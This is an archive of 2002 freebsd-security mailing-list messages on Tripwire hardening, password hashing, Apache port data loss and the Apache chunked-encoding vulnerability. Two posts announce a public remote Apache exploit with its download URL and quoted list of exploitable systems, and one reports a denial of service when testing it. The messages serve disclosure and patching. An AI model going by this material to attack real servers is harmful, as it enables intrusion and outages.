X-Accept-Language: en MIME-Version: 1.0 To: Maxlor Cc: freebsd-security@FreeBSD.ORG Subject: Re: preventing tampering with tripwire References: <27700541.1024450071@[10.0.0.16]> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi, Maxlor wrote: > > After being rooted recently (no idea how it happened - I was following the > SAs and whatnot... and yes, I already formatted and reinstalled), I decided > to install tripwire, so I would be alerted to something like that sooner. Good idea, check out Aide as well and then our signed_exec kernel patches from http://www.trojanproof.org , as time allows and further testing of the V2 code which is available as a beta only for OpenBSD 3.1 Release we will port the V2 code to FreeBSD 4.6 Release and stable branch as well as current which extends cover from binaries and scripts to KLD's and shared libraries. DO read our paper at http://www.trojanproof.org/sigexec.pdf for an idea of what we are up to and be sure to note that our original reference code checks binaries and scripts only in a relatively simple and stable way that is very compute expensive whereas the new V2 code does more and very efficiently. > The thing installed fine and is running ok, there's just this one thing > thats puzzling me: > > How do I prevent an intruder that somehow gains root on my machine from > simply replacing the tripwire binary that always gives me an "everything > ok" report? Include the binary in your tripwire or aide checklist then do an md5 or sha1 signature check of the database and have a human check this with a copy kept off the system daily. > I've been considering putting the binary on a floppy or CD, but then an > intruder could simply unmount the disk and place the replacement binaries > in the mountpoint dir. Run the system in securelevel 2 to avoid raw access to the disk and monitor the system log after each and every reboot. > I'm currently running tripwire as a nightly cronjob, and I'd rather not > resort to mounting a disk, running tripwire from it manually, then > unmounting it. You know, my lazyness and the effort needed to do this would > lead to me eventually no longer doing it... > > So, how did you solve this problem? Combine security features relative to your risk and the cost in terms of effort you are prepared to put in. If I had more time I would be offering assistance with porting the cool new systrace facility just integrated into the OpenBSD base system in OpenBSD current see http://www.citi.umich.edu/u/provos/systrace - someone please :) Cheers, Mike. -- Michael A. Williams Security Software Engineering and InfoSec Manager NetXSecure NZ Limited, http://www.nxs.co.nz Ph: +64.3.318.2973 Fax: +64.3.318.2975 Mob: +64.21.995.914 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 19 23:36:34 2002 Delivered-To: freebsd-security@freebsd.org Received: from phoenix.tricom.com.ph (phoenix.tricom.com.ph [203.167.87.58]) by hub.freebsd.org (Postfix) with SMTP id 9B50337B407 for ; Wed, 19 Jun 2002 23:36:29 -0700 (PDT) Received: (qmail 50554 invoked from network); 20 Jun 2002 06:35:22 -0000 Received: from unknown (HELO orion.tricom.com.ph) (203.167.87.59) by phoenix.tricom.com.ph with SMTP; 20 Jun 2002 06:35:22 -0000 Date: Thu, 20 Jun 2002 14:36:23 +0800 From: Jimmy To: freebsd-security@freebsd.org Subject: FreeBSD Security Notice FreeBSD-SN-02:04 [courier-imap not updated] Message-Id: <20020620143623.1a2565c4.jimmy@tricom.com.ph> Organization: Tricom X-Mailer: Sylpheed version 0.7.6 (GTK+ 1.2.10; i386-portbld-freebsd4.6) Mime-Version: 1.0 Content-Type: multipart/signed; protocol="application/pgp-signature"; boundary="=.Co/zb/Ko7/gLqe" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --=.Co/zb/Ko7/gLqe Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Hello, I received the security advisory, therefore, I cvsuped the src and ports, but after cvsuping the ports I noticed that courier-imap is not updated; PORTNAME= courier-imap PORTVERSION= 1.4.3 PORTREVISION= 0 CATEGORIES= mail ipv6 MASTER_SITES= ${MASTER_SITE_SOURCEFORGE} MASTER_SITE_SUBDIR= courier Is there something wrong with my cvsup? Thanks in Advance -- Jimmy Lim Operation & Support Team Leader IT Department Tricom --=.Co/zb/Ko7/gLqe Content-Type: application/pgp-signature -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.7 (FreeBSD) iD8DBQE9EXfpIr5NBZzlYgARAgHSAKCvi6ww7tJYtQia/vAGIvNP4YfDEACg6kEv Y9EzlaV/ncDn9aivXNjhhSg= =ojCf -----END PGP SIGNATURE----- --=.Co/zb/Ko7/gLqe-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 20 1:44:42 2002 Delivered-To: freebsd-security@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id C207737B40B for ; Thu, 20 Jun 2002 01:44:37 -0700 (PDT) Received: by flood.ping.uio.no (Postfix, from userid 2602) id A8FF05361; Thu, 20 Jun 2002 10:44:33 +0200 (CEST) X-URL: http://www.ofug.org/~des/ X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated. To: "Eric F Crist" Cc: "'Ryan Thompson'" , "'Bill Moran'" , Subject: Re: Password security References: <001b01c21818$7c748d10$77fe180c@armageddon> From: Dag-Erling Smorgrav Date: 20 Jun 2002 10:44:32 +0200 In-Reply-To: <001b01c21818$7c748d10$77fe180c@armageddon> Message-ID: Lines: 12 User-Agent: Gnus/5.0808 (Gnus v5.8.8) Emacs/21.2 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org "Eric F Crist" writes: > What I failed to point out was that, if you're using FreeBSD, which I > assume you as you're posting to this group, the FreeBSD login utility > still only recognizes 8 character passwords, unless you've changed that. Wrong. The 8-character limit was imposed by the traditional DES-based password hashing algorithm, not by login(1). By default, FreeBSD uses an MD5-based hash, and supports passwords of arbitrary length. DES -- Dag-Erling Smorgrav - des@ofug.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 20 2:49:55 2002 Delivered-To: freebsd-security@freebsd.org Received: from omta05.mta.everyone.net (sitemail3.everyone.net [216.200.145.37]) by hub.freebsd.org (Postfix) with ESMTP id 4F86C37B400 for ; Thu, 20 Jun 2002 02:49:40 -0700 (PDT) Received: from sitemail.everyone.net (dsnat [216.200.145.62]) by omta05.mta.everyone.net (Postfix) with ESMTP id 1175249680; Thu, 20 Jun 2002 02:49:36 -0700 (PDT) Received: by sitemail.everyone.net (Postfix, from userid 99) id 9CB9036F9; Thu, 20 Jun 2002 02:49:35 -0700 (PDT) Content-Type: text/plain Content-Disposition: inline Content-Transfer-Encoding: 7bit Mime-Version: 1.0 X-Mailer: MIME-tools 5.41 (Entity 5.404) Date: Thu, 20 Jun 2002 02:49:35 -0700 (PDT) From: Muhammad Faisal Rauf Danka To: isp-tech@isp-tech.com, isp-security@isp-security.com, isp-linux@isp-linux.com Cc: freebsd-security@freebsd.org, security-discuss@linuxsecurity.com Reply-To: mfrd@attitudex.com X-Originating-Ip: [202.5.128.45] Message-Id: <20020620094935.9CB9036F9@sitemail.everyone.net> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org GOBBLES Security released Remote Apache 1.3.x Exploit, at http://online.securityfocus.com/attachment/2002-06-20/apache-scalp.c As it's mentioned in the exploit that: < * The "experts" have already concurred that this bug... * - Can not be exploited on 32-bit *nix variants * - Is only exploitable on win32 platforms * - Is only exploitable on certain 64-bit systems * * However, contrary to what ISS would have you believe, we have * successfully exploited this hole on the following operating systems: * * Sun Solaris 6-8 (sparc/x86) * FreeBSD 4.3-4.5 (x86) * OpenBSD 2.6-3.1 (x86) * Linux (GNU) 2.4 (x86) * * Don't get discouraged too quickly in your own research. It took us close * to two months to be able to exploit each of the above operating systems. * There is a peculiarity to be found for each operating system that makes the * exploitation possible. > So i think x86 apache admins shouldn't be like "[ aah its only for win32 and 64 bit *nixes, ]" and I again repeat that even 64 bit *nixes include SPARCH Solaris which is found in abundance. I think its about time Sun people should take notice of it. Sites like sunfreeware.com and alike should put updated apache packages. else bad time for solaris sparc apache admins. Regards, --------- Muhammad Faisal Rauf Danka Chief Technology Officer Gem Internet Services (Pvt) Ltd. web: www.gem.net.pk Vice President Pakistan Computer Emergency Responce Team (PakCERT) web: www.pakcert.org Chief Security Analyst Applied Technology Research Center (ATRC) web: www.atrc.net.pk _____________________________________________________________ --------------------------- [ATTITUDEX.COM] http://www.attitudex.com/ --------------------------- _____________________________________________________________ Promote your group and strengthen ties to your members with email@yourgroup.org by Everyone.net http://www.everyone.net/?btn=tag To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 20 3: 4:27 2002 Delivered-To: freebsd-security@freebsd.org Received: from omta03.mta.everyone.net (sitemail3.everyone.net [216.200.145.37]) by hub.freebsd.org (Postfix) with ESMTP id DE20937B406 for ; Thu, 20 Jun 2002 03:03:48 -0700 (PDT) Received: from sitemail.everyone.net (dsnat [216.200.145.62]) by omta03.mta.everyone.net (Postfix) with ESMTP id D03C14A344 for ; Thu, 20 Jun 2002 03:03:47 -0700 (PDT) Received: by sitemail.everyone.net (Postfix, from userid 99) id BA9563ECC; Thu, 20 Jun 2002 03:03:47 -0700 (PDT) Content-Type: text/plain Content-Disposition: inline Content-Transfer-Encoding: 7bit Mime-Version: 1.0 X-Mailer: MIME-tools 5.41 (Entity 5.404) Date: Thu, 20 Jun 2002 03:03:47 -0700 (PDT) From: Muhammad Faisal Rauf Danka To: freebsd-security@freebsd.org Subject: Apache vulnerability for 32 bit *nix and 64 bit *nix (solaris/SPARC) Reply-To: mfrd@attitudex.com X-Originating-Ip: [202.5.128.45] Message-Id: <20020620100347.BA9563ECC@sitemail.everyone.net> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org GOBBLES Security released Remote Apache 1.3.x Exploit, at http://online.securityfocus.com/attachment/2002-06-20/apache-scalp.c As it's mentioned in the exploit that: < * The "experts" have already concurred that this bug... * - Can not be exploited on 32-bit *nix variants * - Is only exploitable on win32 platforms * - Is only exploitable on certain 64-bit systems * * However, contrary to what ISS would have you believe, we have * successfully exploited this hole on the following operating systems: * * Sun Solaris 6-8 (sparc/x86) * FreeBSD 4.3-4.5 (x86) * OpenBSD 2.6-3.1 (x86) * Linux (GNU) 2.4 (x86) * * Don't get discouraged too quickly in your own research. It took us close * to two months to be able to exploit each of the above operating systems. * There is a peculiarity to be found for each operating system that makes the * exploitation possible. > So i think x86 apache admins shouldn't be like "[ aah its only for win32 and 64 bit *nixes, ]" and I again repeat that even 64 bit *nixes include SPARCH Solaris which is found in abundance. I think its about time Sun people should also take notice of it. Sites like sunfreeware.com and alike should put updated apache packages. Else bad time for solaris sparc/ apache admins. Regards, --------- Muhammad Faisal Rauf Danka Chief Technology Officer Gem Internet Services (Pvt) Ltd. web: www.gem.net.pk Vice President Pakistan Computer Emergency Responce Team (PakCERT) web: www.pakcert.org Chief Security Analyst Applied Technology Research Center (ATRC) web: www.atrc.net.pk _____________________________________________________________ --------------------------- [ATTITUDEX.COM] http://www.attitudex.com/ --------------------------- _____________________________________________________________ Promote your group and strengthen ties to your members with email@yourgroup.org by Everyone.net http://www.everyone.net/?btn=tag To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 20 3:44:42 2002 Delivered-To: freebsd-security@freebsd.org Received: from ds.express.ru (ds.express.ru [212.24.32.7]) by hub.freebsd.org (Postfix) with ESMTP id 340CF37B404 for ; Thu, 20 Jun 2002 03:44:37 -0700 (PDT) Received: from localhost.express.ru ([127.0.0.1] helo=localhost) by ds.express.ru with esmtp (Exim 2.12 #8) id 17KzQZ-000Ajl-00 for freebsd-security@freebsd.org; Thu, 20 Jun 2002 14:44:35 +0400 Date: Thu, 20 Jun 2002 14:44:35 +0400 (MSD) From: Maxim Kozin To: freebsd-security@freebsd.org Subject: Re: Apache expoit? In-Reply-To: <2147483647.1024500409@[192.168.4.154]> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Wed, 19 Jun 2002, Jason DiCioccio wrote: > I don?t know if this has already made bugtraq, or if it's waiting in their > queue or what.. But I just happened to get ahold of this recently. It > appears that FreeBSD and OpenBSD are exploitable. ...skipped... "Exploit" from this letter tested on FreeBSD 4.6-RELEASE with different version apache: 1) 2.0.36 2) 2.0.39 3) 1.3.26 In case of 1) and (!) 2) httpd child died with "child out of swap space". So, in 2.0.39 still exists DoS. Solution with login.conf not worked , because apache not used setclass*() setusercontext() function. p.s. 2.0.39 configured as: ./configure \ "--with-layout=Apache" \ "--enable-threads" \ "--enable-shared=max" \ "--enable-module=all" \ "--with-mpm=worker" b.r. Kozin Maxim To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 20 3:58:44 2002 Delivered-To: freebsd-security@freebsd.org Received: from mail.speakeasy.net (mail11.speakeasy.net [216.254.0.211]) by hub.freebsd.org (Postfix) with ESMTP id 9B97937B409 for ; Thu, 20 Jun 2002 03:58:41 -0700 (PDT) Received: (qmail 13894 invoked from network); 20 Jun 2002 10:58:40 -0000 Received: from unknown (HELO max) ([66.92.76.227]) (envelope-sender ) by mail11.speakeasy.net (qmail-ldap-1.03) with SMTP for ; 20 Jun 2002 10:58:40 -0000 Message-ID: <200206200658470001.031DD337@mail.speakeasy.net> In-Reply-To: References: X-Mailer: Calypso Version 3.30.00.00 (4) Date: Thu, 20 Jun 2002 06:58:47 -0400 Reply-To: jdarnold@buddydog.org From: "Jonathan Arnold" To: freebsd-security@FreeBSD.ORG Subject: Re: Apache 1.3.26 port Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: quoted-printable Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >data.default? Or are you saying that it was linked to data.default and= you >think (as well as I) that it should let you know before blowing >data.default away (perhaps a make flag)? Yes, that's what I'm saying - it completely replaced data.default without warning, and it shouldn't. -- Jonathan Arnold (mailto:jdarnold@buddydog.org) The Incredible Brightness of Seeing, a Home Theater weblog http://jdarnold.tzo.com/HomeTheater To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 20 4: 1:39 2002 Delivered-To: freebsd-security@freebsd.org Received: from mail.speakeasy.net (mail13.speakeasy.net [216.254.0.213]) by hub.freebsd.org (Postfix) with ESMTP id 9855137B416 for ; Thu, 20 Jun 2002 04:01:19 -0700 (PDT) Received: (qmail 570 invoked from network); 20 Jun 2002 11:01:17 -0000 Received: from unknown (HELO max) ([66.92.76.227]) (envelope-sender ) by mail13.speakeasy.net (qmail-ldap-1.03) with SMTP for ; 20 Jun 2002 11:01:17 -0000 Message-ID: <200206200701240307.032039B1@mail.speakeasy.net> In-Reply-To: <3D110D17.50809@potentialtech.com> References: <200206191723590704.0033D6FF@mail.speakeasy.net> <3D110D17.50809@potentialtech.com> X-Mailer: Calypso Version 3.30.00.00 (4) Date: Thu, 20 Jun 2002 07:01:24 -0400 Reply-To: jdarnold@buddydog.org From: "Jonathan Arnold" To: freebsd-security@FreeBSD.ORG Subject: Re: Apache 1.3.26 port Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: quoted-printable Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >> I lost my entire web site with nary a peep, and luckily had the most= important >> stuff on another computer. >This is outrageous. Have you ever heard of backups? I can't believe No kidding. Notice how I said that I had most of the other stuff on another computer. >you're >blaming loss of data on this. As a system administrator you should be Yeah, that is in fact *exactly* what I'm doing. After all, portupgrade remove the directory tree without warning. Even if I had a 100% backup, it still would have cost me a good part of the day to fix it. It's very simple - don't delete and/or replace a folder without warning. -- Jonathan Arnold (mailto:jdarnold@buddydog.org) The Incredible Brightness of Seeing, a Home Theater weblog http://jdarnold.tzo.com/HomeTheater To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 20 4:12:20 2002 Delivered-To: freebsd-security@freebsd.org Received: from aristotle.tamu.edu (Aristotle.tamu.edu [165.91.161.90]) by hub.freebsd.org (Postfix) with ESMTP id 3492737B401 for ; Thu, 20 Jun 2002 04:12:18 -0700 (PDT) Received: from aristotle.tamu.edu (localhost [127.0.0.1]) by aristotle.tamu.edu (8.12.3/8.12.3) with ESMTP id g5KBBq8t064689 for ; Thu, 20 Jun 2002 06:11:52 -0500 (CDT) (envelope-from rasmith@aristotle.tamu.edu) Message-Id: <200206201111.g5KBBq8t064689@aristotle.tamu.edu> To: freebsd-security@FreeBSD.ORG Subject: Re: Apache 1.3.26 port In-Reply-To: Message from "Jonathan Arnold" of "Thu, 20 Jun 2002 06:58:47 EDT." <200206200658470001.031DD337@mail.speakeasy.net> Mime-Version: 1.0 (generated by tm-edit 7.106) Content-Type: text/plain; charset=US-ASCII Date: Thu, 20 Jun 2002 06:11:52 -0500 From: Robin Smith Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Worth adding that the apache port will also overwrite cgi-bin.default; if you have /cgi-bin symlinked to that, you are also hosed. Though it's easy enough to notice this, I too don't see why this particular gotcha needs to be in the port. Why not just let the port create empty data and cgi-bin directories rather than symlinks? This is really off-topic for freebsd-security, but those of you who've lost web site content might want to look again. Robin Smith To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 20 4:30:40 2002 Delivered-To: freebsd-security@freebsd.org Received: from axl.seasidesoftware.co.za (axl.seasidesoftware.co.za [196.31.7.201]) by hub.freebsd.org (Postfix) with ESMTP id 92E7837B400 for ; Thu, 20 Jun 2002 04:30:34 -0700 (PDT) Received: from sheldonh by axl.seasidesoftware.co.za with local (Exim 3.36 #1) id 17L09j-000J8m-00; Thu, 20 Jun 2002 13:31:15 +0200 Date: Thu, 20 Jun 2002 13:31:15 +0200 From: Sheldon Hearn To: Jonathan Arnold Cc: freebsd-security@FreeBSD.ORG Subject: Re: Apache 1.3.26 port Message-ID: <20020620113115.GA73571@starjuice.net> Mail-Followup-To: Jonathan Arnold , freebsd-security@FreeBSD.ORG References: <200206200658470001.031DD337@mail.speakeasy.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <200206200658470001.031DD337@mail.speakeasy.net> User-Agent: Mutt/1.5.1i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On (2002/06/20 06:58), Jonathan Arnold wrote: > >data.default? Or are you saying that it was linked to data.default and you > >think (as well as I) that it should let you know before blowing > >data.default away (perhaps a make flag)? > > Yes, that's what I'm saying - it completely replaced data.default without > warning, and it shouldn't. I don't understand why it shouldn't. Is it because people are replacing the contents of data.default with their own content and leaving the symlink in place? If so, then the problem has to do with the fact that folks aren't using the symlinks and .defaults directories as intended. I think the intention was always for the operator to replace the symlink with either a directory or a symlink to the directory containing local content. Ciao, Sheldon. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 20 4:38:55 2002 Delivered-To: freebsd-security@freebsd.org Received: from sirius.pbegames.com (sirius.pbegames.com [64.124.9.107]) by hub.freebsd.org (Postfix) with ESMTP id 7655B37B400 for ; Thu, 20 Jun 2002 04:38:51 -0700 (PDT) Received: from leviathan.pbegames.com (medusa.pbegames.com [141.156.220.22]) by sirius.pbegames.com (8.11.5/8.11.5) with ESMTP id g5KBcoc85721 for ; Thu, 20 Jun 2002 07:38:50 -0400 (EDT) (envelope-from thomas@pbegames.com) Message-Id: <5.1.0.14.2.20020620073651.02008090@pbegames.com> X-Sender: thomas@pbegames.com X-Mailer: QUALCOMM Windows Eudora Version 5.1 Date: Thu, 20 Jun 2002 07:38:57 -0400 To: freebsd-security@FreeBSD.ORG From: Mark Thomas Subject: Re: Apache 1.3.26 port In-Reply-To: <20020620113115.GA73571@starjuice.net> References: <200206200658470001.031DD337@mail.speakeasy.net> <200206200658470001.031DD337@mail.speakeasy.net> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 01:31 PM 6/20/02 +0200, Sheldon Hearn wrote: >Is it because people are replacing the contents of data.default with >their own content and leaving the symlink in place? > >If so, then the problem has to do with the fact that folks aren't using >the symlinks and .defaults directories as intended. I think the >intention was always for the operator to replace the symlink with either >a directory or a symlink to the directory containing local content. OK, where exactly are these symlinks supposed to be? I upgraded 3 servers last night with no issues (though in 2/3 cases I had non-standard locations for data and cgi-bin directories). I just reviewed the apache13 port tree and didn't see anything resembling the data.default symlink mentioned. Mark Thomas --- thomas@pbegames.com ----> http://www.pbegames.com/~thomas Play by Electron Games -> http://www.pbegames.com Free Trial Games To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 20 4:49:20 2002 Delivered-To: freebsd-security@freebsd.org Received: from aldigital.com (geology.thebunker.net [213.129.64.4]) by hub.freebsd.org (Postfix) with ESMTP id C14E837B40B for ; Thu, 20 Jun 2002 04:49:15 -0700 (PDT) Received: from algroup.co.uk (localhost [127.0.0.1]) by aldigital.com (8.11.6/8.11.6) with ESMTP id g5KBmId02245; Thu, 20 Jun 2002 12:48:44 +0100 (BST) (envelope-from adam@algroup.co.uk) Message-ID: <3D11C102.40307@algroup.co.uk> Date: Thu, 20 Jun 2002 12:48:18 +0100 From: Adam Laurie Organization: A.L. Group plc User-Agent: Mozilla/5.0 (X11; U; Linux i386; en-US; rv:1.0rc1) Gecko/20020417 X-Accept-Language: en-us, en MIME-Version: 1.0 To: apache-ssl , apache-sslannounce , FreeBSD Security Subject: ANNOUNCE: apache_1.3.26+ssl_1.48 released Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org This release incorporates the new version of apache that addresses the chunking issue described here: http://www.apacheweek.com/features/security-13 (Apache Chunked encoding vulnerability CAN-2002-0392) should hit mirrors shortly. http://www.apache-ssl.org/#Download cheers, Adam -- Adam Laurie Tel: +44 (20) 8742 0755 A.L. Digital Ltd. Fax: +44 (20) 8742 5995 The Stores http://www.thebunker.net 2 Bath Road http://www.aldigital.co.uk London W4 1LT mailto:adam@algroup.co.uk UNITED KINGDOM PGP key on keyservers To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 20 4:53:29 2002 Delivered-To: freebsd-security@freebsd.org Received: from axl.seasidesoftware.co.za (axl.seasidesoftware.co.za [196.31.7.201]) by hub.freebsd.org (Postfix) with ESMTP id 48A4737B403 for ; Thu, 20 Jun 2002 04:53:24 -0700 (PDT) Received: from sheldonh by axl.seasidesoftware.co.za with local (Exim 3.36 #1) id 17L0VX-000Jpy-00; Thu, 20 Jun 2002 13:53:47 +0200 Date: Thu, 20 Jun 2002 13:53:47 +0200 From: Sheldon Hearn To: Mark Thomas Cc: freebsd-security@FreeBSD.ORG Subject: Re: Apache 1.3.26 port Message-ID: <20020620115347.GC73571@starjuice.net> Mail-Followup-To: Mark Thomas , freebsd-security@FreeBSD.ORG References: <200206200658470001.031DD337@mail.speakeasy.net> <200206200658470001.031DD337@mail.speakeasy.net> <5.1.0.14.2.20020620073651.02008090@pbegames.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <5.1.0.14.2.20020620073651.02008090@pbegames.com> User-Agent: Mutt/1.5.1i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On (2002/06/20 07:38), Mark Thomas wrote: > OK, where exactly are these symlinks supposed to be? I upgraded 3 servers > last night with no issues (though in 2/3 cases I had non-standard locations > for data and cgi-bin directories). I just reviewed the apache13 port tree > and didn't see anything resembling the data.default symlink mentioned. The symlinks aren't created if the cgi-bin and data directories already exist. They're only created so that a default installation of Apache "works", in that http://localhost/ shows a page. If you already have cgi-bin and data directories, the port leaves them alone. You can see the symlinks being created in the pkg-list: | www/data.default/apache_pb.gif | @exec [ -d %D/www/data/ ] || ln -fs %B %D/www/data | [...] | www/cgi-bin.default/printenv | @exec [ -d %D/www/cgi-bin/ ] || ln -fs %B %D/www/cgi-bin You can see support for removing the symlinks at uninstall time in the pkg-plist: | @unexec if [ -L %D/www/cgi-bin ]; then rm -f %D/www/cgi-bin; fi | @unexec if [ -L %D/www/data ]; then rm -f %D/www/data; fi So basically, folks who have their web content blown away by the port or package have fallen victim to a process that's actually intended to make things safe. What was never considered was that people would leave the symlinks in place. Ciao, Sheldon. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 20 5: 3: 7 2002 Delivered-To: freebsd-security@freebsd.org Received: from tomts8-srv.bellnexxia.net (tomts8.bellnexxia.net [209.226.175.52]) by hub.freebsd.org (Postfix) with ESMTP id C074437B409; Thu, 20 Jun 2002 05:03:02 -0700 (PDT) Received: from localhost ([65.95.162.21]) by tomts8-srv.bellnexxia.net (InterMail vM.5.01.04.19 201-253-122-122-119-20020516) with ESMTP id <20020620120257.PFCO14183.tomts8-srv.bellnexxia.net@localhost>; Thu, 20 Jun 2002 08:02:57 -0400 Date: Thu, 20 Jun 2002 08:03:01 -0400 Subject: Re: Apache 1.3.26 port Content-Type: text/plain; charset=US-ASCII; format=flowed Mime-Version: 1.0 (Apple Message framework v482) Cc: freebsd-ports@freebsd.org To: freebsd-security@FreeBSD.ORG From: Bryan Fullerton In-Reply-To: <20020620113115.GA73571@starjuice.net> Message-Id: Content-Transfer-Encoding: 7bit X-Mailer: Apple Mail (2.482) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Thursday, June 20, 2002, at 07:31 AM, Sheldon Hearn wrote: > Is it because people are replacing the contents of data.default with > their own content and leaving the symlink in place? It's because the port does things significantly differently than installing from the distribution tarball and doesn't explain what it's doing. In this case, patching the Makefile.tmpl to include lines that do a rm -rf of the *.default directories. Regardless, this seems more a -ports issue than a -security issue. > If so, then the problem has to do with the fact that folks aren't using > the symlinks and .defaults directories as intended. I think the > intention was always for the operator to replace the symlink with either > a directory or a symlink to the directory containing local content. That the intention isn't clear indicates that this needs clarification. That people have lost data indicates that the documentation is incomplete. Bryan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 20 5:22: 6 2002 Delivered-To: freebsd-security@freebsd.org Received: from gw.nectar.cc (gw.nectar.cc [208.42.49.153]) by hub.freebsd.org (Postfix) with ESMTP id 73C3A37B400; Thu, 20 Jun 2002 05:22:01 -0700 (PDT) Received: from madman.nectar.cc (madman.nectar.cc [10.0.1.111]) by gw.nectar.cc (Postfix) with ESMTP id E509036; Thu, 20 Jun 2002 07:22:00 -0500 (CDT) Received: from madman.nectar.cc (localhost [IPv6:::1]) by madman.nectar.cc (8.12.3/8.12.3) with ESMTP id g5KCM0JI052920; Thu, 20 Jun 2002 07:22:00 -0500 (CDT) (envelope-from nectar@madman.nectar.cc) Received: (from nectar@localhost) by madman.nectar.cc (8.12.3/8.12.3/Submit) id g5KCLxPB052919; Thu, 20 Jun 2002 07:21:59 -0500 (CDT) Date: Thu, 20 Jun 2002 07:21:59 -0500 From: "Jacques A. Vidrine" To: Jimmy Cc: freebsd-security@freebsd.org, nbm@freebsd.org Subject: Re: FreeBSD Security Notice FreeBSD-SN-02:04 [courier-imap not updated] Message-ID: <20020620122159.GB52793@madman.nectar.cc> Mail-Followup-To: "Jacques A. Vidrine" , Jimmy , freebsd-security@freebsd.org, nbm@FreeBSD.org References: <20020620143623.1a2565c4.jimmy@tricom.com.ph> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20020620143623.1a2565c4.jimmy@tricom.com.ph> User-Agent: Mutt/1.3.99i X-Url: http://www.nectar.cc/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: 